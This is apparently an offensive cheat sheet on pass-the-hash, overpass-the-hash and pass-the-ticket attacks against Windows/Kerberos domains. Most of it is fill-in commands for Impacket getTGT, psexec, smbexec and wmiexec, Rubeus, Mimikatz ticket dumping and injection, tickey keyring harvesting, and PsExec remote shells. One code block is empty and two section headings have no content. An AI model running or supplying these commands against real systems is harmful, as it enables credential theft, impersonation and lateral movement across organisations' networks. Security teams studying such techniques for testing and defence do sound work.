# Use Alternate Authentication Material

## Application Access Token

## Pass the Hash

### Overpass The Hash/Pass The Key (PTK)

#### Impacket

Request the TGT with hash

```
python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
```

Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)

```
python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
```

Request the TGT with password

```
python getTGT.py <domain_name>/<user_name>:[password]
```

Set the TGT for impacket use

```
export KRB5CCNAME=<TGT_ccache_file>
```

Execute remote commands with any of the following by using the TGT

```
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

```
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

```
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

#### Rubeus and PsExec

Ask and inject the ticket

```
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
```

Execute a cmd in the remote machine

```
.\PsExec.exe -accepteula \\<remote_hostname> cmd
```

## Pass the Ticket

### Pass The Ticket (PTT)

#### Harvest tickets from Linux

* Check type and location of tickets:

  ```
  grep default_ccache_name /etc/krb5.conf
  ```
* If none return, default is `FILE:/tmp/krb5cc_%{uid}`.
* In case of file tickets, you can copy-paste (if you have permissions) for use them.
* In case of being `*KEYRING*` tickets, you can use [tickey](https://github.com/TarlogicSecurity/tickey) to get them:

```
cp tickey /tmp/tickey
```

```
/tmp/tickey -i
```

#### Harvest tickets from Windows

With [Mimikatz](https://github.com/gentilkiwi/mimikatz):

```
mimikatz # sekurlsa::tickets /export
```

With [Rubeus](https://github.com/GhostPack/Rubeus) in Powershell:

```
.\Rubeus dump
```

After dump with Rubeus tickets in base64, to write the in a file

```
```

To convert tickets between Linux/Windows format with [ticket\_converter.py](https://github.com/Zer1t0/ticket_converter):

```
python ticket_converter.py ticket.kirbi ticket.ccache
```

```
python ticket_converter.py ticket.ccache ticket.kirbi
```

#### Using ticket in Linux:

Set the ticket for impacket use

```
export KRB5CCNAME=<TGT_ccache_file_path>
```

Execute remote commands with any of the following by using the TGT

```
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

```
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

```
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

#### Using ticket in Windows

Inject ticket with [Mimikatz](https://github.com/gentilkiwi/mimikatz):

```
mimikatz # kerberos::ptt <ticket_kirbi_file>
```

Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus):

```
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
```

Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec):

```
.\PsExec.exe -accepteula \\<remote_hostname> cmd
```

## Web Session Cookie